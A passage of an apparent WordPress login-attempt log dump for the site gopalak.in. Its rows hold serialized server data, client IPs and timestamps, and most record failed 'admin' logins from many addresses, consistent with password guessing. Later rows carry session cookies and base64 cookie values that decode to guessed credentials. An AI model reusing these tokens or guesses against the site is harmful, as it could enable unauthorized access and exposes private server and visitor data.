Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43560\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745395255.2155859;s:12:\"REQUEST_TIME\";i:1745395255;}}','162.0.232.11',0,'2025-04-23 13:30:57','1970-01-01 00:00:00'),(93855,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42324\";s:11:\"REMOTE_ADDR\";s:12:\"69.21.27.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745395657.3099639;s:12:\"REQUEST_TIME\";i:1745395657;}}','69.21.27.131',0,'2025-04-23 13:37:39','1970-01-01 00:00:00'),(93856,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58994\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.126.239\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745396051.9366839;s:12:\"REQUEST_TIME\";i:1745396051;}}','128.199.126.239',0,'2025-04-23 13:44:13','1970-01-01 00:00:00'),(93857,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58474\";s:11:\"REMOTE_ADDR\";s:15:\"103.152.248.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745396447.5998039;s:12:\"REQUEST_TIME\";i:1745396447;}}','103.152.248.191',0,'2025-04-23 13:50:49','1970-01-01 00:00:00'),(93858,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55476\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.217.169\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745396840.138787;s:12:\"REQUEST_TIME\";i:1745396840;}}','162.0.217.169',0,'2025-04-23 13:57:22','1970-01-01 00:00:00'),(93859,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35134\";s:11:\"REMOTE_ADDR\";s:12:\"5.10.248.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745397236.040827;s:12:\"REQUEST_TIME\";i:1745397236;}}','5.10.248.130',0,'2025-04-23 14:03:57','1970-01-01 00:00:00'),(93860,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47082\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.165.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745397629.995157;s:12:\"REQUEST_TIME\";i:1745397629;}}','176.126.165.66',0,'2025-04-23 14:10:31','1970-01-01 00:00:00'),(93861,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40848\";s:11:\"REMOTE_ADDR\";s:14:\"20.198.224.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398029.404578;s:12:\"REQUEST_TIME\";i:1745398029;}}','20.198.224.111',0,'2025-04-23 14:17:11','1970-01-01 00:00:00'),(93862,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:254:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398415.577244;s:12:\"REQUEST_TIME\";i:1745398415;}}','170.64.166.21',1,'2025-04-23 14:23:37','2025-04-23 14:33:44'),(93863,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7MTIzNDU2\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398417.373672;s:12:\"REQUEST_TIME\";i:1745398417;}}','170.64.166.21',1,'2025-04-23 14:23:39','2025-04-23 14:33:44'),(93864,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7cGFzc3dvcmQ%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"C